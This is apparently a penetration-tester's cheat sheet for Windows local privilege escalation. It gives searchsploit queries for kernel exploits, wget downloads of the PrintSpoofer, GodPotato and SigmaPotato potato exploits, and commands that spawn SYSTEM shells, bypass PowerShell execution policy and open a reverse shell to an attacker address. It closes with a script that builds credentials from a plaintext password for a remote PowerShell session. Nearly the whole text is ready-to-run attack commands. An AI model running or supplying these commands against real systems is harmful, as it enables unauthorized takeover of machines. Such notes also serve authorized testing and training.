Windows
Online Resource
Finding Kernel Exploits
SearchSploit:
searchploit <keyword>
searchsploit -m <EDB-ID>
For Kernal Vulnerabilities:
searchsploit "windows kernel <keyword> Local Privilege Escalation"
Identify <OS Name>, <OS Version>, and <OS Architecture> to fill for <keyword> with -
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
OR
wmic os get Caption,Version,OSArchitecture
Example: searchsploit "windows kernel Build XXXXX Local Privilege Escalation"Exploit Permissions
SeImpersonatePrivilege
PrintSpoofer:
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
OR
wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe
PrintSpoofer.exe -i -c <command>
# Execute a Command as root
PrintSpoofer.exe -c cmd
# Spawn a command prompt as root on current session
PrintSpoofer.exe -d <curent pid> -c "powershell -ep bypass"
# Spawn SYSTEM process
# Identify current process ID with - qwinsta
GodPotato.exe:
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe
#Verify .NET framework to use with - reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s
./GodPotato-NET4.exe -cmd "<command>"
# Execute a Command
SigmaPotato.exe:
wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
./SigmaPotato.exe <command>
# Execute a Command
./SigmaPotato.exe --revshell <ip_addr> <port>
# Establish a PowerShell Reverse ShellScript to Create PS session
$username = "<username>";
$password = "<password>";
$secureString = ConvertTo-SecureString $password -AsPlainText -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;
New-PSSession -ComputerName LEGACY -Credential $credential
To access the session: Enter-PSSession 1Last updated